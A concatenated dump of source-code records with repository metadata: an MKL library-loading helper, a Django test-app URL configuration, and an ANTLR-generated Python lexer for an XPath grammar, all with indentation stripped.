def _loadMKL():
try:
# Look for MKL in path
MKLlib = CDLL(libname[platform])
except:
try:
# Look for anaconda mkl
if 'Anaconda' in sys.version:
if platform in ['linux', 'linux2','darwin']:
libpath = ['/']+sys.executable.split('/')[:-2] + \
['lib',libname[platform]]
elif platform == 'win32':
libpath = sys.executable.split(os.sep)[:-1] + \
['Library','bin',libname[platform]]
MKLlib = CDLL(os.path.join(*libpath))
except Exception as e:
raise e
return MKLlib
| 32.433333
| 70
| 0.505653
|
794fcda35dce03ecd1e5700c24b77d104458f143
| 535
|
py
|
Python
|
test_app/urls.py
|
benzkji/django-minimalist-cms
|
b25024c489e2be3fb3a7f664a2535592fd89d08c
|
[
"MIT"
] | null | null | null |
test_app/urls.py
|
benzkji/django-minimalist-cms
|
b25024c489e2be3fb3a7f664a2535592fd89d08c
|
[
"MIT"
] | 8
|
2019-01-10T11:59:06.000Z
|
2019-10-22T17:25:36.000Z
|
test_app/urls.py
|
benzkji/django-minimalist-cms
|
b25024c489e2be3fb3a7f664a2535592fd89d08c
|
[
"MIT"
] | 1
|
2019-04-09T11:18:36.000Z
|
2019-04-09T11:18:36.000Z
|
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import url, include
from django.contrib import admin
from django.conf.urls.static import static
from test_app.views import TestModelView
admin.autodiscover()
urlpatterns = [
url(r'^$', TestModelView.as_view(), name='test_view'),
url(
r'^admin/', admin.site.urls
),
]
if settings.DEBUG and settings.MEDIA_ROOT:
urlpatterns += static(
settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT
)
| 20.576923
| 58
| 0.721495
|
794fce11a66db5cfcee95b74dfac9cd163d5f7e6
| 20,649
|
py
|
Python
|
xpath/compilerv1/XPathLexer.py
|
cs4221/xpath
|
55cbfe7e7e0d4ec0edd85cf0cb5fa9c0320356e6
|
[
"Unlicense"
] | null | null | null |
xpath/compilerv1/XPathLexer.py
|
cs4221/xpath
|
55cbfe7e7e0d4ec0edd85cf0cb5fa9c0320356e6
|
[
"Unlicense"
] | null | null | null |
xpath/compilerv1/XPathLexer.py
|
cs4221/xpath
|
55cbfe7e7e0d4ec0edd85cf0cb5fa9c0320356e6
|
[
"Unlicense"
] | null | null | null |
# Generated from .\xpath\xpathgrammer\XPath.g4 by ANTLR 4.9.3
from antlr4 import *
from io import StringIO
import sys
if sys.version_info[1] > 5:
from typing import TextIO
else:
from typing.io import TextIO
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\2A")
buf.write("\u01ed\b\1\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7")
buf.write("\t\7\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r")
buf.write("\4\16\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23")
buf.write("\t\23\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30")
buf.write("\4\31\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\4\36")
buf.write("\t\36\4\37\t\37\4 \t \4!\t!\4\"\t\"\4#\t#\4$\t$\4%\t%")
buf.write("\4&\t&\4\'\t\'\4(\t(\4)\t)\4*\t*\4+\t+\4,\t,\4-\t-\4.")
buf.write("\t.\4/\t/\4\60\t\60\4\61\t\61\4\62\t\62\4\63\t\63\4\64")
buf.write("\t\64\4\65\t\65\4\66\t\66\4\67\t\67\48\t8\49\t9\4:\t:")
buf.write("\4;\t;\4<\t<\4=\t=\4>\t>\4?\t?\4@\t@\4A\tA\4B\tB\4C\t")
buf.write("C\3\2\3\2\3\2\3\2\3\3\3\3\3\3\3\3\3\3\3\3\3\3\3\3\3\3")
buf.write("\3\3\3\3\3\3\5\3\u0098\n\3\3\4\3\4\7\4\u009c\n\4\f\4\16")
buf.write("\4\u009f\13\4\3\5\6\5\u00a2\n\5\r\5\16\5\u00a3\3\6\3\6")
buf.write("\3\6\3\6\3\6\3\6\5\6\u00ac\n\6\3\7\3\7\3\7\3\7\5\7\u00b2")
buf.write("\n\7\3\b\3\b\3\t\3\t\3\n\3\n\3\13\3\13\3\f\3\f\3\f\3\r")
buf.write("\3\r\3\16\3\16\3\16\3\17\3\17\3\20\3\20\3\21\3\21\3\21")
buf.write("\3\22\3\22\3\23\3\23\3\23\3\24\3\24\3\25\3\25\3\25\3\26")
buf.write("\3\26\3\27\3\27\3\27\3\30\3\30\3\30\3\31\3\31\3\32\3\32")
buf.write("\3\32\3\33\3\33\3\33\3\34\3\34\3\35\3\35\3\36\3\36\3\36")
buf.write("\3\37\3\37\3 \3 \3!\3!\3\"\3\"\3#\3#\3$\3$\3%\3%\3%\3")
buf.write("&\3&\3\'\3\'\3\'\3(\3(\3)\3)\3)\3*\3*\3+\3+\3+\3+\3+\3")
buf.write("+\3+\3+\3+\3,\3,\3,\3,\3,\3,\3,\3,\3,\3,\3,\3,\3,\3,\3")
buf.write(",\3,\3,\3-\3-\3-\3-\3.\3.\3.\3.\3.\3.\3.\3.\3.\3.\3/\3")
buf.write("/\3/\3/\3/\3/\3\60\3\60\3\60\3\60\3\60\3\60\3\60\3\60")
buf.write("\3\61\3\61\3\61\3\61\3\61\3\61\3\61\3\61\3\61\3\61\3\61")
buf.write("\3\62\3\62\3\62\3\62\3\62\3\62\3\62\3\62\3\62\3\62\3\62")
buf.write("\3\62\3\62\3\62\3\62\3\62\3\62\3\62\3\62\3\63\3\63\3\63")
buf.write("\3\63\3\63\3\63\3\63\3\63\3\63\3\63\3\64\3\64\3\64\3\64")
buf.write("\3\64\3\64\3\64\3\64\3\64\3\64\3\64\3\64\3\64\3\64\3\64")
buf.write("\3\64\3\64\3\64\3\65\3\65\3\65\3\65\3\65\3\66\3\66\3\66")
buf.write("\3\66\3\67\3\67\3\67\38\38\38\38\38\38\38\39\39\39\39")
buf.write("\39\39\39\39\39\39\3:\3:\3:\3:\3:\3:\3:\3:\3:\3:\3:\3")
buf.write(":\3:\3:\3:\3:\3:\3:\3;\3;\3;\3;\3;\3;\3;\3;\3;\3;\3;\3")
buf.write(";\3;\3;\3;\3;\3;\3;\3;\3;\3;\3;\3;\3<\3<\3<\3<\3<\3=\3")
buf.write("=\3=\3=\3=\3>\3>\3?\3?\3?\7?\u01cc\n?\f?\16?\u01cf\13")
buf.write("?\3?\3?\3?\3?\7?\u01d5\n?\f?\16?\u01d8\13?\3?\5?\u01db")
buf.write("\n?\3@\3@\3@\3A\3A\3B\6B\u01e3\nB\rB\16B\u01e4\3C\6C\u01e8")
buf.write("\nC\rC\16C\u01e9\3C\3C\4\u01cd\u01d6\2D\3\3\5\4\7\5\t")
buf.write("\6\13\7\r\b\17\t\21\n\23\13\25\f\27\r\31\16\33\17\35\20")
buf.write("\37\21!\22#\23%\24\'\25)\26+\27-\30/\31\61\32\63\33\65")
buf.write("\34\67\359\36;\37= ?!A\"C#E$G%I&K\'M(O)Q*S+U,W-Y.[/]\60")
buf.write("_\61a\62c\63e\64g\65i\66k\67m8o9q:s;u<w=y>{?}@\177\2\u0081")
buf.write("\2\u0083\2\u0085A\3\2\b\5\2C\\aac|\7\2/\60\62;C\\aac|")
buf.write("\4\2$$``\3\2))\3\2\62;\5\2\13\f\16\17\"\"\2\u0205\2\3")
buf.write("\3\2\2\2\2\5\3\2\2\2\2\7\3\2\2\2\2\t\3\2\2\2\2\13\3\2")
buf.write("\2\2\2\r\3\2\2\2\2\17\3\2\2\2\2\21\3\2\2\2\2\23\3\2\2")
buf.write("\2\2\25\3\2\2\2\2\27\3\2\2\2\2\31\3\2\2\2\2\33\3\2\2\2")
buf.write("\2\35\3\2\2\2\2\37\3\2\2\2\2!\3\2\2\2\2#\3\2\2\2\2%\3")
buf.write("\2\2\2\2\'\3\2\2\2\2)\3\2\2\2\2+\3\2\2\2\2-\3\2\2\2\2")
buf.write("/\3\2\2\2\2\61\3\2\2\2\2\63\3\2\2\2\2\65\3\2\2\2\2\67")
buf.write("\3\2\2\2\29\3\2\2\2\2;\3\2\2\2\2=\3\2\2\2\2?\3\2\2\2\2")
buf.write("A\3\2\2\2\2C\3\2\2\2\2E\3\2\2\2\2G\3\2\2\2\2I\3\2\2\2")
buf.write("\2K\3\2\2\2\2M\3\2\2\2\2O\3\2\2\2\2Q\3\2\2\2\2S\3\2\2")
buf.write("\2\2U\3\2\2\2\2W\3\2\2\2\2Y\3\2\2\2\2[\3\2\2\2\2]\3\2")
buf.write("\2\2\2_\3\2\2\2\2a\3\2\2\2\2c\3\2\2\2\2e\3\2\2\2\2g\3")
buf.write("\2\2\2\2i\3\2\2\2\2k\3\2\2\2\2m\3\2\2\2\2o\3\2\2\2\2q")
buf.write("\3\2\2\2\2s\3\2\2\2\2u\3\2\2\2\2w\3\2\2\2\2y\3\2\2\2\2")
buf.write("{\3\2\2\2\2}\3\2\2\2\2\u0085\3\2\2\2\3\u0087\3\2\2\2\5")
buf.write("\u0097\3\2\2\2\7\u0099\3\2\2\2\t\u00a1\3\2\2\2\13\u00ab")
buf.write("\3\2\2\2\r\u00b1\3\2\2\2\17\u00b3\3\2\2\2\21\u00b5\3\2")
buf.write("\2\2\23\u00b7\3\2\2\2\25\u00b9\3\2\2\2\27\u00bb\3\2\2")
buf.write("\2\31\u00be\3\2\2\2\33\u00c0\3\2\2\2\35\u00c3\3\2\2\2")
buf.write("\37\u00c5\3\2\2\2!\u00c7\3\2\2\2#\u00ca\3\2\2\2%\u00cc")
buf.write("\3\2\2\2\'\u00cf\3\2\2\2)\u00d1\3\2\2\2+\u00d4\3\2\2\2")
buf.write("-\u00d6\3\2\2\2/\u00d9\3\2\2\2\61\u00dc\3\2\2\2\63\u00de")
buf.write("\3\2\2\2\65\u00e1\3\2\2\2\67\u00e4\3\2\2\29\u00e6\3\2")
buf.write("\2\2;\u00e8\3\2\2\2=\u00eb\3\2\2\2?\u00ed\3\2\2\2A\u00ef")
buf.write("\3\2\2\2C\u00f1\3\2\2\2E\u00f3\3\2\2\2G\u00f5\3\2\2\2")
buf.write("I\u00f7\3\2\2\2K\u00fa\3\2\2\2M\u00fc\3\2\2\2O\u00ff\3")
buf.write("\2\2\2Q\u0101\3\2\2\2S\u0104\3\2\2\2U\u0106\3\2\2\2W\u010f")
buf.write("\3\2\2\2Y\u0120\3\2\2\2[\u0124\3\2\2\2]\u012e\3\2\2\2")
buf.write("_\u0134\3\2\2\2a\u013c\3\2\2\2c\u0147\3\2\2\2e\u015a\3")
buf.write("\2\2\2g\u0164\3\2\2\2i\u0176\3\2\2\2k\u017b\3\2\2\2m\u017f")
buf.write("\3\2\2\2o\u0182\3\2\2\2q\u0189\3\2\2\2s\u0193\3\2\2\2")
buf.write("u\u01a5\3\2\2\2w\u01bc\3\2\2\2y\u01c1\3\2\2\2{\u01c6\3")
buf.write("\2\2\2}\u01da\3\2\2\2\177\u01dc\3\2\2\2\u0081\u01df\3")
buf.write("\2\2\2\u0083\u01e2\3\2\2\2\u0085\u01e7\3\2\2\2\u0087\u0088")
buf.write("\7f\2\2\u0088\u0089\7q\2\2\u0089\u008a\7e\2\2\u008a\4")
buf.write("\3\2\2\2\u008b\u0098\5U+\2\u008c\u0098\5W,\2\u008d\u0098")
buf.write("\5[.\2\u008e\u0098\5]/\2\u008f\u0098\5a\61\2\u0090\u0098")
buf.write("\5c\62\2\u0091\u0098\5e\63\2\u0092\u0098\5g\64\2\u0093")
buf.write("\u0098\5o8\2\u0094\u0098\5q9\2\u0095\u0098\5s:\2\u0096")
buf.write("\u0098\5w<\2\u0097\u008b\3\2\2\2\u0097\u008c\3\2\2\2\u0097")
buf.write("\u008d\3\2\2\2\u0097\u008e\3\2\2\2\u0097\u008f\3\2\2\2")
buf.write("\u0097\u0090\3\2\2\2\u0097\u0091\3\2\2\2\u0097\u0092\3")
buf.write("\2\2\2\u0097\u0093\3\2\2\2\u0097\u0094\3\2\2\2\u0097\u0095")
buf.write("\3\2\2\2\u0097\u0096\3\2\2\2\u0098\6\3\2\2\2\u0099\u009d")
buf.write("\t\2\2\2\u009a\u009c\t\3\2\2\u009b\u009a\3\2\2\2\u009c")
buf.write("\u009f\3\2\2\2\u009d\u009b\3\2\2\2\u009d\u009e\3\2\2\2")
buf.write("\u009e\b\3\2\2\2\u009f\u009d\3\2\2\2\u00a0\u00a2\t\3\2")
buf.write("\2\u00a1\u00a0\3\2\2\2\u00a2\u00a3\3\2\2\2\u00a3\u00a1")
buf.write("\3\2\2\2\u00a3\u00a4\3\2\2\2\u00a4\n\3\2\2\2\u00a5\u00ac")
buf.write("\5+\26\2\u00a6\u00ac\5\67\34\2\u00a7\u00ac\5\61\31\2\u00a8")
buf.write("\u00ac\5\63\32\2\u00a9\u00ac\5-\27\2\u00aa\u00ac\5;\36")
buf.write("\2\u00ab\u00a5\3\2\2\2\u00ab\u00a6\3\2\2\2\u00ab\u00a7")
buf.write("\3\2\2\2\u00ab\u00a8\3\2\2\2\u00ab\u00a9\3\2\2\2\u00ab")
buf.write("\u00aa\3\2\2\2\u00ac\f\3\2\2\2\u00ad\u00b2\5m\67\2\u00ae")
buf.write("\u00b2\5Y-\2\u00af\u00b2\5k\66\2\u00b0\u00b2\5C\"\2\u00b1")
buf.write("\u00ad\3\2\2\2\u00b1\u00ae\3\2\2\2\u00b1\u00af\3\2\2\2")
buf.write("\u00b1\u00b0\3\2\2\2\u00b2\16\3\2\2\2\u00b3\u00b4\7B\2")
buf.write("\2\u00b4\20\3\2\2\2\u00b5\u00b6\7#\2\2\u00b6\22\3\2\2")
buf.write("\2\u00b7\u00b8\7_\2\2\u00b8\24\3\2\2\2\u00b9\u00ba\7\177")
buf.write("\2\2\u00ba\26\3\2\2\2\u00bb\u00bc\7<\2\2\u00bc\u00bd\7")
buf.write("?\2\2\u00bd\30\3\2\2\2\u00be\u00bf\7<\2\2\u00bf\32\3\2")
buf.write("\2\2\u00c0\u00c1\7<\2\2\u00c1\u00c2\7<\2\2\u00c2\34\3")
buf.write("\2\2\2\u00c3\u00c4\7.\2\2\u00c4\36\3\2\2\2\u00c5\u00c6")
buf.write("\7+\2\2\u00c6 \3\2\2\2\u00c7\u00c8\7<\2\2\u00c8\u00c9")
buf.write("\7,\2\2\u00c9\"\3\2\2\2\u00ca\u00cb\7\60\2\2\u00cb$\3")
buf.write("\2\2\2\u00cc\u00cd\7\60\2\2\u00cd\u00ce\7\60\2\2\u00ce")
buf.write("&\3\2\2\2\u00cf\u00d0\7&\2\2\u00d0(\3\2\2\2\u00d1\u00d2")
buf.write("\7?\2\2\u00d2\u00d3\7@\2\2\u00d3*\3\2\2\2\u00d4\u00d5")
buf.write("\7?\2\2\u00d5,\3\2\2\2\u00d6\u00d7\7@\2\2\u00d7\u00d8")
buf.write("\7?\2\2\u00d8.\3\2\2\2\u00d9\u00da\7@\2\2\u00da\u00db")
buf.write("\7@\2\2\u00db\60\3\2\2\2\u00dc\u00dd\7@\2\2\u00dd\62\3")
buf.write("\2\2\2\u00de\u00df\7>\2\2\u00df\u00e0\7?\2\2\u00e0\64")
buf.write("\3\2\2\2\u00e1\u00e2\7>\2\2\u00e2\u00e3\7>\2\2\u00e3\66")
buf.write("\3\2\2\2\u00e4\u00e5\7>\2\2\u00e58\3\2\2\2\u00e6\u00e7")
buf.write("\7/\2\2\u00e7:\3\2\2\2\u00e8\u00e9\7#\2\2\u00e9\u00ea")
buf.write("\7?\2\2\u00ea<\3\2\2\2\u00eb\u00ec\7]\2\2\u00ec>\3\2\2")
buf.write("\2\u00ed\u00ee\7}\2\2\u00ee@\3\2\2\2\u00ef\u00f0\7*\2")
buf.write("\2\u00f0B\3\2\2\2\u00f1\u00f2\7~\2\2\u00f2D\3\2\2\2\u00f3")
buf.write("\u00f4\7-\2\2\u00f4F\3\2\2\2\u00f5\u00f6\7%\2\2\u00f6")
buf.write("H\3\2\2\2\u00f7\u00f8\7~\2\2\u00f8\u00f9\7~\2\2\u00f9")
buf.write("J\3\2\2\2\u00fa\u00fb\7A\2\2\u00fbL\3\2\2\2\u00fc\u00fd")
buf.write("\7,\2\2\u00fd\u00fe\7<\2\2\u00feN\3\2\2\2\u00ff\u0100")
buf.write("\7\61\2\2\u0100P\3\2\2\2\u0101\u0102\7\61\2\2\u0102\u0103")
buf.write("\7\61\2\2\u0103R\3\2\2\2\u0104\u0105\7,\2\2\u0105T\3\2")
buf.write("\2\2\u0106\u0107\7c\2\2\u0107\u0108\7p\2\2\u0108\u0109")
buf.write("\7e\2\2\u0109\u010a\7g\2\2\u010a\u010b\7u\2\2\u010b\u010c")
buf.write("\7v\2\2\u010c\u010d\7q\2\2\u010d\u010e\7t\2\2\u010eV\3")
buf.write("\2\2\2\u010f\u0110\7c\2\2\u0110\u0111\7p\2\2\u0111\u0112")
buf.write("\7e\2\2\u0112\u0113\7g\2\2\u0113\u0114\7u\2\2\u0114\u0115")
buf.write("\7v\2\2\u0115\u0116\7q\2\2\u0116\u0117\7t\2\2\u0117\u0118")
buf.write("\7/\2\2\u0118\u0119\7q\2\2\u0119\u011a\7t\2\2\u011a\u011b")
buf.write("\7/\2\2\u011b\u011c\7u\2\2\u011c\u011d\7g\2\2\u011d\u011e")
buf.write("\7n\2\2\u011e\u011f\7h\2\2\u011fX\3\2\2\2\u0120\u0121")
buf.write("\7c\2\2\u0121\u0122\7p\2\2\u0122\u0123\7f\2\2\u0123Z\3")
buf.write("\2\2\2\u0124\u0125\7c\2\2\u0125\u0126\7v\2\2\u0126\u0127")
buf.write("\7v\2\2\u0127\u0128\7t\2\2\u0128\u0129\7k\2\2\u0129\u012a")
buf.write("\7d\2\2\u012a\u012b\7w\2\2\u012b\u012c\7v\2\2\u012c\u012d")
buf.write("\7g\2\2\u012d\\\3\2\2\2\u012e\u012f\7e\2\2\u012f\u0130")
buf.write("\7j\2\2\u0130\u0131\7k\2\2\u0131\u0132\7n\2\2\u0132\u0133")
buf.write("\7f\2\2\u0133^\3\2\2\2\u0134\u0135\7e\2\2\u0135\u0136")
buf.write("\7q\2\2\u0136\u0137\7o\2\2\u0137\u0138\7o\2\2\u0138\u0139")
buf.write("\7g\2\2\u0139\u013a\7p\2\2\u013a\u013b\7v\2\2\u013b`\3")
buf.write("\2\2\2\u013c\u013d\7f\2\2\u013d\u013e\7g\2\2\u013e\u013f")
buf.write("\7u\2\2\u013f\u0140\7e\2\2\u0140\u0141\7g\2\2\u0141\u0142")
buf.write("\7p\2\2\u0142\u0143\7f\2\2\u0143\u0144\7c\2\2\u0144\u0145")
buf.write("\7p\2\2\u0145\u0146\7v\2\2\u0146b\3\2\2\2\u0147\u0148")
buf.write("\7f\2\2\u0148\u0149\7g\2\2\u0149\u014a\7u\2\2\u014a\u014b")
buf.write("\7e\2\2\u014b\u014c\7g\2\2\u014c\u014d\7p\2\2\u014d\u014e")
buf.write("\7f\2\2\u014e\u014f\7c\2\2\u014f\u0150\7p\2\2\u0150\u0151")
buf.write("\7v\2\2\u0151\u0152\7/\2\2\u0152\u0153\7q\2\2\u0153\u0154")
buf.write("\7t\2\2\u0154\u0155\7/\2\2\u0155\u0156\7u\2\2\u0156\u0157")
buf.write("\7g\2\2\u0157\u0158\7n\2\2\u0158\u0159\7h\2\2\u0159d\3")
buf.write("\2\2\2\u015a\u015b\7h\2\2\u015b\u015c\7q\2\2\u015c\u015d")
buf.write("\7n\2\2\u015d\u015e\7n\2\2\u015e\u015f\7q\2\2\u015f\u0160")
buf.write("\7y\2\2\u0160\u0161\7k\2\2\u0161\u0162\7p\2\2\u0162\u0163")
buf.write("\7i\2\2\u0163f\3\2\2\2\u0164\u0165\7h\2\2\u0165\u0166")
buf.write("\7q\2\2\u0166\u0167\7n\2\2\u0167\u0168\7n\2\2\u0168\u0169")
buf.write("\7q\2\2\u0169\u016a\7y\2\2\u016a\u016b\7k\2\2\u016b\u016c")
buf.write("\7p\2\2\u016c\u016d\7i\2\2\u016d\u016e\7/\2\2\u016e\u016f")
buf.write("\7u\2\2\u016f\u0170\7k\2\2\u0170\u0171\7d\2\2\u0171\u0172")
buf.write("\7n\2\2\u0172\u0173\7k\2\2\u0173\u0174\7p\2\2\u0174\u0175")
buf.write("\7i\2\2\u0175h\3\2\2\2\u0176\u0177\7p\2\2\u0177\u0178")
buf.write("\7q\2\2\u0178\u0179\7f\2\2\u0179\u017a\7g\2\2\u017aj\3")
buf.write("\2\2\2\u017b\u017c\7p\2\2\u017c\u017d\7q\2\2\u017d\u017e")
buf.write("\7v\2\2\u017el\3\2\2\2\u017f\u0180\7q\2\2\u0180\u0181")
buf.write("\7t\2\2\u0181n\3\2\2\2\u0182\u0183\7r\2\2\u0183\u0184")
buf.write("\7c\2\2\u0184\u0185\7t\2\2\u0185\u0186\7g\2\2\u0186\u0187")
buf.write("\7p\2\2\u0187\u0188\7v\2\2\u0188p\3\2\2\2\u0189\u018a")
buf.write("\7r\2\2\u018a\u018b\7t\2\2\u018b\u018c\7g\2\2\u018c\u018d")
buf.write("\7e\2\2\u018d\u018e\7g\2\2\u018e\u018f\7f\2\2\u018f\u0190")
buf.write("\7k\2\2\u0190\u0191\7p\2\2\u0191\u0192\7i\2\2\u0192r\3")
buf.write("\2\2\2\u0193\u0194\7r\2\2\u0194\u0195\7t\2\2\u0195\u0196")
buf.write("\7g\2\2\u0196\u0197\7e\2\2\u0197\u0198\7g\2\2\u0198\u0199")
buf.write("\7f\2\2\u0199\u019a\7k\2\2\u019a\u019b\7p\2\2\u019b\u019c")
buf.write("\7i\2\2\u019c\u019d\7/\2\2\u019d\u019e\7u\2\2\u019e\u019f")
buf.write("\7k\2\2\u019f\u01a0\7d\2\2\u01a0\u01a1\7n\2\2\u01a1\u01a2")
buf.write("\7k\2\2\u01a2\u01a3\7p\2\2\u01a3\u01a4\7i\2\2\u01a4t\3")
buf.write("\2\2\2\u01a5\u01a6\7r\2\2\u01a6\u01a7\7t\2\2\u01a7\u01a8")
buf.write("\7q\2\2\u01a8\u01a9\7e\2\2\u01a9\u01aa\7g\2\2\u01aa\u01ab")
buf.write("\7u\2\2\u01ab\u01ac\7u\2\2\u01ac\u01ad\7k\2\2\u01ad\u01ae")
buf.write("\7p\2\2\u01ae\u01af\7i\2\2\u01af\u01b0\7/\2\2\u01b0\u01b1")
buf.write("\7k\2\2\u01b1\u01b2\7p\2\2\u01b2\u01b3\7u\2\2\u01b3\u01b4")
buf.write("\7v\2\2\u01b4\u01b5\7t\2\2\u01b5\u01b6\7w\2\2\u01b6\u01b7")
buf.write("\7e\2\2\u01b7\u01b8\7v\2\2\u01b8\u01b9\7k\2\2\u01b9\u01ba")
buf.write("\7q\2\2\u01ba\u01bb\7p\2\2\u01bbv\3\2\2\2\u01bc\u01bd")
buf.write("\7u\2\2\u01bd\u01be\7g\2\2\u01be\u01bf\7n\2\2\u01bf\u01c0")
buf.write("\7h\2\2\u01c0x\3\2\2\2\u01c1\u01c2\7v\2\2\u01c2\u01c3")
buf.write("\7g\2\2\u01c3\u01c4\7z\2\2\u01c4\u01c5\7v\2\2\u01c5z\3")
buf.write("\2\2\2\u01c6\u01c7\5\u0083B\2\u01c7|\3\2\2\2\u01c8\u01cd")
buf.write("\7$\2\2\u01c9\u01cc\5\177@\2\u01ca\u01cc\n\4\2\2\u01cb")
buf.write("\u01c9\3\2\2\2\u01cb\u01ca\3\2\2\2\u01cc\u01cf\3\2\2\2")
buf.write("\u01cd\u01ce\3\2\2\2\u01cd\u01cb\3\2\2\2\u01ce\u01d0\3")
buf.write("\2\2\2\u01cf\u01cd\3\2\2\2\u01d0\u01db\7$\2\2\u01d1\u01d6")
buf.write("\7)\2\2\u01d2\u01d5\5\u0081A\2\u01d3\u01d5\n\5\2\2\u01d4")
buf.write("\u01d2\3\2\2\2\u01d4\u01d3\3\2\2\2\u01d5\u01d8\3\2\2\2")
buf.write("\u01d6\u01d7\3\2\2\2\u01d6\u01d4\3\2\2\2\u01d7\u01d9\3")
buf.write("\2\2\2\u01d8\u01d6\3\2\2\2\u01d9\u01db\7)\2\2\u01da\u01c8")
buf.write("\3\2\2\2\u01da\u01d1\3\2\2\2\u01db~\3\2\2\2\u01dc\u01dd")
buf.write("\7$\2\2\u01dd\u01de\7$\2\2\u01de\u0080\3\2\2\2\u01df\u01e0")
buf.write("\7)\2\2\u01e0\u0082\3\2\2\2\u01e1\u01e3\t\6\2\2\u01e2")
buf.write("\u01e1\3\2\2\2\u01e3\u01e4\3\2\2\2\u01e4\u01e2\3\2\2\2")
buf.write("\u01e4\u01e5\3\2\2\2\u01e5\u0084\3\2\2\2\u01e6\u01e8\t")
buf.write("\7\2\2\u01e7\u01e6\3\2\2\2\u01e8\u01e9\3\2\2\2\u01e9\u01e7")
buf.write("\3\2\2\2\u01e9\u01ea\3\2\2\2\u01ea\u01eb\3\2\2\2\u01eb")
buf.write("\u01ec\bC\2\2\u01ec\u0086\3\2\2\2\17\2\u0097\u009d\u00a3")
buf.write("\u00ab\u00b1\u01cb\u01cd\u01d4\u01d6\u01da\u01e4\u01e9")
buf.write("\3\b\2\2")
return buf.getvalue()
class XPathLexer(Lexer):
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
T__0 = 1
AXES = 2
NODE_NAME = 3
DOCUMENT_NAME = 4
PREDICATE_OPERATOR = 5
PREDICATE_CONNECTIVES = 6
AT = 7
BANG = 8
CB = 9
CC = 10
CEQ = 11
COLON = 12
COLONCOLON = 13
COMMA = 14
CP = 15
CS = 16
D = 17
DD = 18
DOLLAR = 19
EG = 20
EQ = 21
GE = 22
GG = 23
GT = 24
LE = 25
LL = 26
LT = 27
MINUS = 28
NE = 29
OB = 30
OC = 31
OP = 32
P = 33
PLUS = 34
POUND = 35
PP = 36
QM = 37
SC = 38
SLASH = 39
SS = 40
STAR = 41
KW_ANCESTOR = 42
KW_ANCESTOR_OR_SELF = 43
KW_AND = 44
KW_ATTRIBUTE = 45
KW_CHILD = 46
KW_COMMENT = 47
KW_DESCENDANT = 48
KW_DESCENDANT_OR_SELF = 49
KW_FOLLOWING = 50
KW_FOLLOWING_SIBLING = 51
KW_NODE = 52
KW_NOT = 53
KW_OR = 54
KW_PARENT = 55
KW_PRECEDING = 56
KW_PRECEDING_SIBLING = 57
KW_PROCESSING_INSTRUCTION = 58
KW_SELF = 59
KW_TEXT = 60
IntegerLiteral = 61
StringLiteral = 62
WS = 63
channelNames = [ u"DEFAULT_TOKEN_CHANNEL", u"HIDDEN" ]
modeNames = [ "DEFAULT_MODE" ]
literalNames = [ "<INVALID>",
"'doc'", "'@'", "'!'", "']'", "'}'", "':='", "':'", "'::'",
"','", "')'", "':*'", "'.'", "'..'", "'$'", "'=>'", "'='", "'>='",
"'>>'", "'>'", "'<='", "'<<'", "'<'", "'-'", "'!='", "'['",
"'{'", "'('", "'|'", "'+'", "'#'", "'||'", "'?'", "'*:'", "'/'",
"'//'", "'*'", "'ancestor'", "'ancestor-or-self'", "'and'",
"'attribute'", "'child'", "'comment'", "'descendant'", "'descendant-or-self'",
"'following'", "'following-sibling'", "'node'", "'not'", "'or'",
"'parent'", "'preceding'", "'preceding-sibling'", "'processing-instruction'",
"'self'", "'text'" ]
symbolicNames = [ "<INVALID>",
"AXES", "NODE_NAME", "DOCUMENT_NAME", "PREDICATE_OPERATOR",
"PREDICATE_CONNECTIVES", "AT", "BANG", "CB", "CC", "CEQ", "COLON",
"COLONCOLON", "COMMA", "CP", "CS", "D", "DD", "DOLLAR", "EG",
"EQ", "GE", "GG", "GT", "LE", "LL", "LT", "MINUS", "NE", "OB",
"OC", "OP", "P", "PLUS", "POUND", "PP", "QM", "SC", "SLASH",
"SS", "STAR", "KW_ANCESTOR", "KW_ANCESTOR_OR_SELF", "KW_AND",
"KW_ATTRIBUTE", "KW_CHILD", "KW_COMMENT", "KW_DESCENDANT", "KW_DESCENDANT_OR_SELF",
"KW_FOLLOWING", "KW_FOLLOWING_SIBLING", "KW_NODE", "KW_NOT",
"KW_OR", "KW_PARENT", "KW_PRECEDING", "KW_PRECEDING_SIBLING",
"KW_PROCESSING_INSTRUCTION", "KW_SELF", "KW_TEXT", "IntegerLiteral",
"StringLiteral", "WS" ]
ruleNames = [ "T__0", "AXES", "NODE_NAME", "DOCUMENT_NAME", "PREDICATE_OPERATOR",
"PREDICATE_CONNECTIVES", "AT", "BANG", "CB", "CC", "CEQ",
"COLON", "COLONCOLON", "COMMA", "CP", "CS", "D", "DD",
"DOLLAR", "EG", "EQ", "GE", "GG", "GT", "LE", "LL", "LT",
"MINUS", "NE", "OB", "OC", "OP", "P", "PLUS", "POUND",
"PP", "QM", "SC", "SLASH", "SS", "STAR", "KW_ANCESTOR",
"KW_ANCESTOR_OR_SELF", "KW_AND", "KW_ATTRIBUTE", "KW_CHILD",
"KW_COMMENT", "KW_DESCENDANT", "KW_DESCENDANT_OR_SELF",
"KW_FOLLOWING", "KW_FOLLOWING_SIBLING", "KW_NODE", "KW_NOT",
"KW_OR", "KW_PARENT", "KW_PRECEDING", "KW_PRECEDING_SIBLING",
"KW_PROCESSING_INSTRUCTION", "KW_SELF", "KW_TEXT", "IntegerLiteral",
"StringLiteral", "FragEscapeQuot", "FragEscapeApos", "FragDigits",
"WS" ]
grammarFileName = "XPath.g4"
def __init__(self, input=None, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.9.3")
self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
self._actions = None
self._predicates = None
| 58.997143
| 103
| 0.557364
|
794fcef4254301fdbd3484937d106394849ac8c2
| 294
|
py
|
Python
|
BOJ/05000~05999/5000~5099/5046.py
|
shinkeonkim/today-ps
|
